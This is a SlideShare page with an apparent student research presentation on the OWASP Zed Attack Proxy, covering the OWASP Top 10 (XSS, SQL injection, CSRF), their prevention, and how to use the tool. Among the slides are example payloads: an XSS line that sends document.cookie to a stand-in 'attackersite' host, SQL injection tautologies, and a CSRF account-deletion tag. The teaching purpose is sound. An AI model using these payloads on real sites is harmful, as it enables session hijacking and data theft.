SlideShare a Scribd company logo

The OWASP Zed Attack Proxy

Download as PPTX, PDF
Aditya Gupta
Aditya Gupta

It is a presentation of the work done in a Research and Development Project on the Zed Attack Proxy Tool.

Education
1 of 38
THE OWASP ZED ATTACK PROXY Research and Development Project Final Report Submitted By:- Pallav Dhobley 09005012 Aditya Gupta 09005017
WARNING Security Testing is VERY ILLEGAL ON UNAUTHORIZED SYSTEMS
Overview • Introduction • OWASP Top 10 Application Security Risks – 2010 • Setting up the Environment • Functioning of ZAP • Conclusion • References
INTRODUCTION
About OWASP • Full form: Open Web Application Security Project • An open-source application security project • Works to create freely-available • Articles • Methodologies • Documentation • Tools, and • Technologies
Features of OWASP • It provides free and open source • Application security tools and standards • Complete books on application security testing, secure code development, and security code review • Standard security controls and libraries • Local chapters worldwide • Cutting edge research • Extensive conferences worldwide • Mailing lists
History of OWASP • OWASP was started on September 9, 2001 • It was started by Mark Curphey and Dennis Groves. • Since late 2003, Jeff Williams served as the volunteer Chair of OWASP until September 2011. • The current chair is Michael Coates, and vice chair is Eoin Keary. • The OWASP Foundation was established in 2004 and supports the OWASP infrastructure and projects
OWASP-Zed Attack Proxy • The Zed Attack Proxy (ZAP) is penetration testing tool for finding vulnerabilities in web applications. • Designed to be used by people with a wide range of security experience • Ideal for new developers and functional testers who are new to penetration testing • Useful addition to an experienced pen testers toolbox • Released September 2010 • Current Version -: 2.0.0
ZAP Principles • Free, Open source • Cross platform • Easy to use • Easy to install • Internationalized • Fully documented • Involvement actively encouraged • Reuse well regarded components
Features of ZAP • Intercepting proxy • Automated scanner • Passive scanner • Brute force scanner • Spider • Fuzzer • Port scanner • Dynamic SSL Certificates • API • Beanshell integration
OWASP TOP 10 APPLICATION SECURITY RISKS
Top 10 Application Security Risks • A1 – Injection • A2 – Cross-Site Scripting (XSS) • A3 – Broken Authentication and Session Management • A4 – Insecure Direct Object References • A5 – Cross-Site Request Forgery (CSRF) • A6 – Security Misconfiguration • A7 – Insecure Cryptographic Storage • A8 – Failure to Restrict URL Access • A9 – Insufficient Transport Layer Protection • A10 – Invalidated Redirects and Forwards
XSS - Cross Site Scripting • Problem: User controlled data returned in HTTP response contains HTML/JavaScript code • Impact: Session Hijacking, Full Control of Page, Malicious Redirects • Basic XSS Test:" ><script>alert(document.cookie)</script> • Cookie Theft Example: "><script>document.location='http://attackersite/ '+document.cookie</script>
Types of XSS • Stored XSS Attacks • The injected code is permanently stored on the target servers • Reflected XSS Attacks • Injected code is reflected off the web server, such as in an error message, search result, or any other response • DOM Based XSS • Attack payload is executed as a result of modifying the DOM “environment” in the victim‟s browser used by the original client side script
Prevention of XSS • Solution • Output Encoding • converts command characters to benign characters • Input Validation • Example • <script> becomes &lt;script&gt; < &lt > &gt “ &quote „ &#x27 & HTML ENCODING &amp
SQL Injection • Problem: Incorrectly validated or non-validated string literals are concatenated into a dynamic SQL statement, and interpreted as code by the SQL engine. • Impact: Arbitrary SQL Execution, Data Corruption, Data Theft • Basic SQL Injection Tests: • OR 1=1 --' OR '1'= '1'-- • Example Vulnerable Query: • sqlQ = “Select user from UserTable where name= '+username+ ' and pass = '+password+ ' ”
Types of SQL Injections • First Order Attack • The attacker can simply enter a malicious string and cause the modified code to be executed immediately. • Second Order Attack • The attacker injects into persistent storage (such as a table row) which is deemed as a trusted source. An attack is subsequently executed by another activity. • Lateral Injection. • The attacker can manipulate the implicit functionTo_Char() by changing the values of the environment variables
Prevention of SQL Injection • Reduce the attack surface. • Ensure that all excess database privileges are revoked • Avoid dynamic SQL with concatenated input • Use bind arguments. • Filter and sanitize input. • The Oracle-supplied DBMS_ASSERT package contains a number of functions that can be used to sanitize user input
Cross Site Request Forgery (CSRF) • Problem: • Browser cannot distinguish between user initiated actions and automated actions • Websites process valid requests that are authorized to user and contain user session id • Impact: • Attacker can perform arbitrary actions with victim user‟s account on third party site. • Not traceable, logs show user performed these actions. • Basic CSRF Test: • <img src=”http://targetsite/?action=deleteAccount”></img>
Prevention Measures That Do NOT Work • Using a Secret Cookie • Only Accepting POST Requests • Multi-Step Transactions • URL Rewriting
Prevention of CSRF • Preventing CSRF requires the inclusion of an unpredictable token in the body or URL of each HTTP request • Such tokens should at a minimum be unique per user session, but can also be unique per request. • The preferred option is to include the unique token in a hidden field. • The unique token can also be included in the URL itself, or a URL parameter
SETTING UP THE ENVIRONMENT
Installation and Configuration of ZAP • Download Link: • http://code.google.com/p/zaproxy/downloads/list • Zap runs on proxy. To set up the proxy in ZAP • go to TOOLS > OPTIONS > LOCAL PROXY in ZAP • Same configuration in the browser too
Setting Up Web Security Learning Lab • Required Software • Virtual Machine Software • OWASP Broken Web Apps VM • Web Proxy - Recommend OWASP Zap Proxy • Web Proxy - Alternative Burp Proxy • Browser - Recommend Firefox • Optional - Browser Plugins • Firebug • Firecookie • Installation instructions are written in the final report
FUNCTIONING OF ZAP
Functioning of ZAP • Intercepting the traffic • Traditional and AJAX spiders • Automated scanners • Analysing the scan results • Reporting
Intercepting the traffic • Configure the browser to use ZAP proxy server on localhost • Can intercept all traffic to a user specified website/server • Can click on any link on the site to observe the captured request • Can modify this request before forwarding it to the server • The response can also be intercepted before forwarding it to the browser
Spidering • ZAP spider is needed to crawl links that are not directly visible • It automatically discovers and explores the hidden links for a site • Newly discovered URLs are shown • URLs whose domain is different from target are also listed
Scanning the website • Active Scanning • Can select a site to be attacked under the „Attack‟ section • Tool actually attacks the application in all possible ways to find out all possible vulnerabilities • Some of the issues active scan looks for are : • Cross Site Scripting • SQL Injection • External Redirect • Parameter tampering • Directory browsing • All findings shown under „Alerts‟ tab
Scanning the website • Passive scanning • Unlike active scanning, passive scanning does not change any responses coming from server • Only looks at responses to identify vulnerabilities • Safe to use • Some of the issues passive scanning looks for : • Incomplete or no cache-control and pragma HTTP Header set • Cross-domain JavaScript source file inclusion • Cross Site Request Forgery • Password Autocomplete in browser • Weak authentication
Analysis and Reporting • No tool‟s report is free from false positives • Security analyst can determine which vulnerabilities are false positives • It also shows the level of threat associated with the vulnerability • High, Medium, Low • Analysed results are used to generate the report • Can generate a detailed report of all vulnerabilities; can be exported to HTML file and viewed in a browser
Other ZAP features • Port Scan • This feature scans open ports on the target site and lists them accordingly • Encode/Decode Hash • This feature is used to encode/ decode the text entered • Fuzzing • Fuzzing is the process of sending invalid and unexpected input to the application to observe the behaviour • Extensions for ZAP • ZAP has plugins like LDAP Injection, session fixation etc. and many others that can be found on • http://code.google.com/p/zap-extensions/
CONCLUSION
ZAP- Firefox of Web Security • ZAP is a free, open-source community developed tool aimed at making the online world more secure • Some of the ideals that have driven ZAP are listed below • Help users develop and apply application security skills • Build a competitive, open source, and community oriented platform • Provide an extensible platform for testing • Designed to be easy to use • Raise the bar for other security tools
Future of ZAP • Enhance scanners to detect more vulnerabilities • Extend API, better integration • Fuzzing analysis • Easier to use, better help
References • Open Web Application Security Project • https://www.owasp.org/index.php/Main_Page • OWASP Top Ten Project • https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Proj ect • Cross-site Scripting (XSS) • https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) • OWASP Zed Attack Proxy Project • https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Proj ect • Zaproxy : • https://code.google.com/p/zaproxy/
References (contd.) • ZAP Blog: • http://zaproxy.blogspot.co.uk/ • Penetration Testing For Developers • http://pentest4devs.blogspot.in/2010/09/exploring-web-application- with-zap.html • Setting Up Web Security Learning Lab • http://people.mozilla.org/~mcoates/WebSecurityLab.html • Webgoat: • https://www.owasp.org/index.php/OWASP_WebGoat_Project
THANK YOU !!! Questions ?

Recommended

Owasp zap
Owasp zapOwasp zap
Owasp zapColdFusionConference
 
Zed attack proxy [ What is ZAP(Zed Attack Proxy)? ]
Zed attack proxy [ What is ZAP(Zed Attack Proxy)? ]Zed attack proxy [ What is ZAP(Zed Attack Proxy)? ]
Zed attack proxy [ What is ZAP(Zed Attack Proxy)? ]raj upadhyay
 
OWASP Zed Attack Proxy
OWASP Zed Attack ProxyOWASP Zed Attack Proxy
OWASP Zed Attack ProxyFadi Abdulwahab
 
Owasp zap
Owasp zapOwasp zap
Owasp zappenetration Tester
 
Learn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAPLearn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAPPaul Ionescu
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Introduction to burp suite
Introduction to burp suiteIntroduction to burp suite
Introduction to burp suiteUtkarsh Bhargava
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 

Recommended

Owasp zap
Owasp zapOwasp zap
Owasp zapColdFusionConference
 
Zed attack proxy [ What is ZAP(Zed Attack Proxy)? ]
Zed attack proxy [ What is ZAP(Zed Attack Proxy)? ]Zed attack proxy [ What is ZAP(Zed Attack Proxy)? ]
Zed attack proxy [ What is ZAP(Zed Attack Proxy)? ]raj upadhyay
 
OWASP Zed Attack Proxy
OWASP Zed Attack ProxyOWASP Zed Attack Proxy
OWASP Zed Attack ProxyFadi Abdulwahab
 
Owasp zap
Owasp zapOwasp zap
Owasp zappenetration Tester
 
Learn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAPLearn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAPPaul Ionescu
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Introduction to burp suite
Introduction to burp suiteIntroduction to burp suite
Introduction to burp suiteUtkarsh Bhargava
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Security testing
Security testingSecurity testing
Security testingTabăra de Testare
 
DAST in CI/CD pipelines using Selenium & OWASP ZAP
DAST in CI/CD pipelines using Selenium & OWASP ZAPDAST in CI/CD pipelines using Selenium & OWASP ZAP
DAST in CI/CD pipelines using Selenium & OWASP ZAPsrini0x00
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrfn|u - The Open Security Community
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Peeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API SecurityPeeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API SecurityMatt Tesauro
 
Automating security test using Selenium and OWASP ZAP - Practical DevSecOps
Automating security test using Selenium and OWASP ZAP - Practical DevSecOpsAutomating security test using Selenium and OWASP ZAP - Practical DevSecOps
Automating security test using Selenium and OWASP ZAP - Practical DevSecOpsMohammed A. Imran
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & TestingDeepu S Nath
 
Analysis of web application penetration testing
Analysis of web application penetration testingAnalysis of web application penetration testing
Analysis of web application penetration testingEngr Md Yusuf Miah
 
Saying Hello to Bug Bounty
Saying Hello to Bug BountySaying Hello to Bug Bounty
Saying Hello to Bug BountyNull Bhubaneswar
 
Security testing
Security testingSecurity testing
Security testingKhizra Sammad
 
Burp suite
Burp suiteBurp suite
Burp suiteYashar Shahinzadeh
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...Lenur Dzhemiliev
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
API Security Fundamentals
API Security FundamentalsAPI Security Fundamentals
API Security FundamentalsJosé Haro Peralta
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
 
Security testautomation
Security testautomationSecurity testautomation
Security testautomationLinkesh Kanna Velu
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security ToolsLalit Kale
 

More Related Content

What's hot

DAST in CI/CD pipelines using Selenium & OWASP ZAP
DAST in CI/CD pipelines using Selenium & OWASP ZAPDAST in CI/CD pipelines using Selenium & OWASP ZAP
DAST in CI/CD pipelines using Selenium & OWASP ZAPsrini0x00
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Peeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API SecurityPeeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API SecurityMatt Tesauro
 
Automating security test using Selenium and OWASP ZAP - Practical DevSecOps
Automating security test using Selenium and OWASP ZAP - Practical DevSecOpsAutomating security test using Selenium and OWASP ZAP - Practical DevSecOps
Automating security test using Selenium and OWASP ZAP - Practical DevSecOpsMohammed A. Imran
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & TestingDeepu S Nath
 
Analysis of web application penetration testing
Analysis of web application penetration testingAnalysis of web application penetration testing
Analysis of web application penetration testingEngr Md Yusuf Miah
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...Lenur Dzhemiliev
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
 

What's hot (20)

Security testing
Security testingSecurity testing
Security testing
 
DAST in CI/CD pipelines using Selenium & OWASP ZAP
DAST in CI/CD pipelines using Selenium & OWASP ZAPDAST in CI/CD pipelines using Selenium & OWASP ZAP
DAST in CI/CD pipelines using Selenium & OWASP ZAP
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
Peeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API SecurityPeeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API Security
 
Automating security test using Selenium and OWASP ZAP - Practical DevSecOps
Automating security test using Selenium and OWASP ZAP - Practical DevSecOpsAutomating security test using Selenium and OWASP ZAP - Practical DevSecOps
Automating security test using Selenium and OWASP ZAP - Practical DevSecOps
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & Testing
 
Analysis of web application penetration testing
Analysis of web application penetration testingAnalysis of web application penetration testing
Analysis of web application penetration testing
 
Saying Hello to Bug Bounty
Saying Hello to Bug BountySaying Hello to Bug Bounty
Saying Hello to Bug Bounty
 
Security testing
Security testingSecurity testing
Security testing
 
Burp suite
Burp suiteBurp suite
Burp suite
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
API Security Fundamentals
API Security FundamentalsAPI Security Fundamentals
API Security Fundamentals
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17
 

Similar to The OWASP Zed Attack Proxy

Application Security Tools
Application Security ToolsApplication Security Tools
Application Security ToolsLalit Kale
 
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017Philippe Gamache
 
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017 OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017 Philippe Gamache
 
Do you lose sleep at night?
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?Nathan Van Gheem
 
Top 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajanTop 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajanAkash Mahajan
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015devObjective
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacksFrank Victory
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Hacker Proof web app using Functional tests
Hacker Proof web app using Functional testsHacker Proof web app using Functional tests
Hacker Proof web app using Functional testsAnkita Gupta
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteDNN
 
Automated tools for penetration testing
Automated tools for penetration testingAutomated tools for penetration testing
Automated tools for penetration testingdevanshdubey7
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure CodingMateusz Olejarka
 
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive ControlsTen Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive ControlsSecuRing
 
Towards a More Secure, Reliable, and Performant Web: Tools / Approaches to Help
Towards a More Secure, Reliable, and Performant Web: Tools / Approaches to HelpTowards a More Secure, Reliable, and Performant Web: Tools / Approaches to Help
Towards a More Secure, Reliable, and Performant Web: Tools / Approaches to HelpStephen Donner
 
Jonathan Singer - Wheezing The Juice.pdf
Jonathan Singer - Wheezing The Juice.pdfJonathan Singer - Wheezing The Juice.pdf
Jonathan Singer - Wheezing The Juice.pdfJonathan Singer
 

Similar to The OWASP Zed Attack Proxy (20)

Security testautomation
Security testautomationSecurity testautomation
Security testautomation
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security Tools
 
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
 
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017 OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
 
Web hackingtools cf-summit2014
Web hackingtools cf-summit2014Web hackingtools cf-summit2014
Web hackingtools cf-summit2014
 
Do you lose sleep at night?
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?
 
Top 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajanTop 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajan
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacks
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
 
Hacker Proof web app using Functional tests
Hacker Proof web app using Functional testsHacker Proof web app using Functional tests
Hacker Proof web app using Functional tests
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET Website
 
Automated tools for penetration testing
Automated tools for penetration testingAutomated tools for penetration testing
Automated tools for penetration testing
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
 
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive ControlsTen Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
 
Towards a More Secure, Reliable, and Performant Web: Tools / Approaches to Help
Towards a More Secure, Reliable, and Performant Web: Tools / Approaches to HelpTowards a More Secure, Reliable, and Performant Web: Tools / Approaches to Help
Towards a More Secure, Reliable, and Performant Web: Tools / Approaches to Help
 
Jonathan Singer - Wheezing The Juice.pdf
Jonathan Singer - Wheezing The Juice.pdfJonathan Singer - Wheezing The Juice.pdf
Jonathan Singer - Wheezing The Juice.pdf
 

More from Aditya Gupta

An Information System For Tum Tums presentation-3
An Information System For Tum Tums presentation-3An Information System For Tum Tums presentation-3
An Information System For Tum Tums presentation-3Aditya Gupta
 
An information system for tum tums presentation-1
An information system for tum tums presentation-1An information system for tum tums presentation-1
An information system for tum tums presentation-1Aditya Gupta
 
An information system for tum tums presentation-2
An information system for tum tums presentation-2An information system for tum tums presentation-2
An information system for tum tums presentation-2Aditya Gupta
 
Managing Dynamic Shared state
Managing Dynamic Shared stateManaging Dynamic Shared state
Managing Dynamic Shared stateAditya Gupta
 
Secure instant messanger service
Secure instant messanger serviceSecure instant messanger service
Secure instant messanger serviceAditya Gupta
 

More from Aditya Gupta (6)

An Information System For Tum Tums presentation-3
An Information System For Tum Tums presentation-3An Information System For Tum Tums presentation-3
An Information System For Tum Tums presentation-3
 
An information system for tum tums presentation-1
An information system for tum tums presentation-1An information system for tum tums presentation-1
An information system for tum tums presentation-1
 
An information system for tum tums presentation-2
An information system for tum tums presentation-2An information system for tum tums presentation-2
An information system for tum tums presentation-2
 
Managing Dynamic Shared state
Managing Dynamic Shared stateManaging Dynamic Shared state
Managing Dynamic Shared state
 
Secure instant messanger service
Secure instant messanger serviceSecure instant messanger service
Secure instant messanger service
 
Ai and law
Ai and lawAi and law
Ai and law
 

Recently uploaded

4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptx4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptxmary850239
 
Keynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designKeynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designMIPLM
 
Barangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptxBarangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptxCarlos105
 
ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4MiaBumagat1
 
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxAUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxiammrhaywood
 
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfGrade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfJemuel Francisco
 
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...JhezDiaz1
 
How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17Celine George
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management SystemChristalin Nelson
 
Culture Uniformity or Diversity IN SOCIOLOGY.pptx
Culture Uniformity or Diversity IN SOCIOLOGY.pptxCulture Uniformity or Diversity IN SOCIOLOGY.pptx
Culture Uniformity or Diversity IN SOCIOLOGY.pptxPoojaSen20
 
Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)cama23
 
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...Nguyen Thanh Tu Collection
 
FILIPINO PSYCHology sikolohiyang pilipino
FILIPINO PSYCHology sikolohiyang pilipinoFILIPINO PSYCHology sikolohiyang pilipino
FILIPINO PSYCHology sikolohiyang pilipinojohnmickonozaleda
 
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSGRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSJoshuaGantuangco2
 
